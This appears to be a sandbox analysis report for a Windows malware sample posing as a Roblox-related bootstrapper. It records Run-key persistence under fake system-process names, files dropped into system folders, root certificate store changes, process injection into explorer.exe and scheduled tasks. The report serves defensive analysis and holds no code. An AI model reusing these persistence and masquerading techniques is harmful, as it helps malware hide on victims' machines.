Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Offline Web Pages\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Offline Web Pages\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\de-DE\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\MSOCache\\All Users\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\DriversavessessionDlldhcp\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\audiodg.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\winNet\\lsm.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\winNet\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\winNet\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Windows\\Offline Web Pages\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\winNet\\spoolsv.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\DriversavessessionDlldhcp\\dwm.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sddsfsdf = "\"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\sddsfsdf = "\"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\winNet\\Idle.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Prefetch\\ReadyBoot\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\MSOCache\\All Users\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\Default User\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Admin\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\DriversavessessionDlldhcp\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\DriversavessessionDlldhcp\\dwm.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\sv-SE\cmd.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Windows\SysWOW64\sv-SE\ebf1f9fa8afd6d C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Windows\System32\CSC9B65422D45F44341A51A8E825BEAE4A.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\m6dw6b.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2520 set thread context of 2388 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Common Files\Services\6203df4a6bafc7 C:\winNet\wscript.exe.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files\Windows Journal\fr-FR\CSCD76AE30457034164B573F4B2A5893960.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\088424020bedd6 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Defender\es-ES\ebf1f9fa8afd6d C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\audiodg.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Updater6\smss.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Updater6\69ddcba757bf72 C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Microsoft Office\Office14\1033\5940a34987c991 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Journal\fr-FR\conhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Portable Devices\dwm.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files (x86)\Common Files\DESIGNER\b75386f1303e64 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files\Windows Journal\fr-FR\conhost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files (x86)\Reference Assemblies\Microsoft\CSCB6ABC6A5FBFC4B328AE5916D92DC1AED.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\088424020bedd6 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\42af1c969fbb7b C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File opened for modification C:\Program Files\Windows Portable Devices\dwm.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files\Windows Portable Devices\6cb0b6c459d5d3 C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files\Common Files\Services\lsass.exe C:\winNet\wscript.exe.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\c5b4cb5e9653cc C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Journal\fr-FR\088424020bedd6 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Defender\es-ES\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Offline Web Pages\Refcrt.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSI58FF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI59BC.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\Downloaded Program Files\explorer.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Prefetch\ReadyBoot\7a0fd90576e088 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Offline Web Pages\a0b1fd4c5438e9 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\de-DE\WmiPrvSE.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Installer\f7753ea.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f7753ea.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Downloaded Program Files\explorer.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Offline Web Pages\886983d96e3d3e C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\133006b48fb54b C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\de-DE\24dbde2999530e C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSI59AC.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Downloaded Program Files\7a0fd90576e088 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Offline Web Pages\csrss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Windows\Offline Web Pages\CSCC2D5E9D23B0A48B6BC6FE4B9ECA6CC38.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\Offline Web Pages\Refcrt.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\Downloaded Program Files\CSCE0C07C03540D456BB3309258DBDFE59B.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\diagnostics\system\DeviceCenter\es-ES\Refcrt.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Prefetch\ReadyBoot\explorer.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [certificate blob omitted] C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
